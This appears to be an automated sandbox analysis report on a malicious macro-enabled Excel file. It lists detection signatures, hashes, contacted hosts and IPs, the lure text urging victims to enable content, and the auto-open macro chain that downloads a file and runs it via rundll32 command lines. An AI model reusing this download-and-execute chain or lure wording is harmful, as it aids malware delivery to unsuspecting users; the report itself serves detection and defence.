Loading ...

Play interactive tourEdit tour

Analysis Report catalog-1521295750.xlsm

Overview

General Information

Sample Name:catalog-1521295750.xlsm
Analysis ID:403410
MD5:72b06d3f0889125b6696fe55db6ff6ab
SHA1:a285f7bc7a6f79885d81de91420e85f223c6f18f
SHA256:bbdaa820461e1e4fbde6b4b79ea407d4c644fb8e227432b879e2eb01bd391f4a
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Yara detected MalDoc1
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6484 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6780 cmdline: rundll32 ..\jordji.nbvt1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6844 cmdline: rundll32 ..\jordji.nbvt11,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: catalog-1521295750.xlsmVirustotal: Detection: 30%Perma Link
    Source: catalog-1521295750.xlsmMetadefender: Detection: 18%Perma Link
    Source: catalog-1521295750.xlsmReversingLabs: Detection: 55%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 192.185.20.98:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.6:49715 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Source: excel.exeMemory has grown: Private usage: 1MB later: 178MB
    Source: global trafficDNS query: name: legalopspr.com
    Source: global trafficTCP traffic: 192.168.2.6:49711 -> 192.185.20.98:443
    Source: global trafficTCP traffic: 192.168.2.6:49711 -> 192.185.20.98:443

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: Joe Sandbox ViewIP Address: 192.185.5.2 192.185.5.2
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS traffic detected: queries for: legalopspr.com
    Source: jordji.nbvt11.0.drString found in binary or memory: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.cortana.ai
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.office.net
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.onedrive.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://augloop.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://cdn.entity.
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://cortana.ai
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://cortana.ai/api
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://cr.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://directory.services.
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://graph.windows.net
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://graph.windows.net/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://login.windows.local
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://management.azure.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://management.azure.com/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://messaging.office.com/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://officeapps.live.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://onedrive.live.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://outlook.office.com/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://settings.outlook.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://tasks.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 4BDFB115-4685-4F97-99A9-00A0FF14FF48.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownHTTPS traffic detected: 192.185.20.98:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.6:49715 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable Editing , please Q,,,, ,,,,,,, ,,,,,,,,,,,,,,,,,,,,, L_ from the yellow bar above p m , ,
    Source: Screenshot number: 12Screenshot OCR: Enable Editing i from the yellow bar above Once You have Enable Editing , please click Enable Co
    Source: Screenshot number: 12Screenshot OCR: Enable Content from the yellow bar above 0 ) WHY I CANNOT OPEN THIS DOCUMENT? I i I W You are
    Source: Document image extraction number: 7Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 7Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 17Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
    Source: Document image extraction number: 17Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: catalog-1521295750.xlsmInitial sample: EXEC
    Source: catalog-1521295750.xlsmInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: catalog-1521295750.xlsmInitial sample: Sheet size: 22177
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/><workbookPr filterPrivacy="1"/><bookViews><workbookView xWindow="8595" yWindow="0" windowWidth="4020" windowHeight="3120"/></bookViews><sheets><sheet name="Sheet1" sheetId="9" r:id="rId1"/><sheet name="Sheet2" sheetId="4" r:id="rId2"/><sheet name="Sheet3" sheetId="7" r:id="rId3"/><sheet name="Sheet4" sheetId="8" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName></definedNames><calcPr calcId="145621"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
    Source: classification engineClassification label: mal76.troj.expl.evad.winXLSM@5/13@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{8EF97119-CA49-427E-9E4F-A12644ED9C1A} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: catalog-1521295750.xlsmVirustotal: Detection: 30%
    Source: catalog-1521295750.xlsmMetadefender: Detection: 18%
    Source: catalog-1521295750.xlsmReversingLabs: Detection: 55%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServerJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
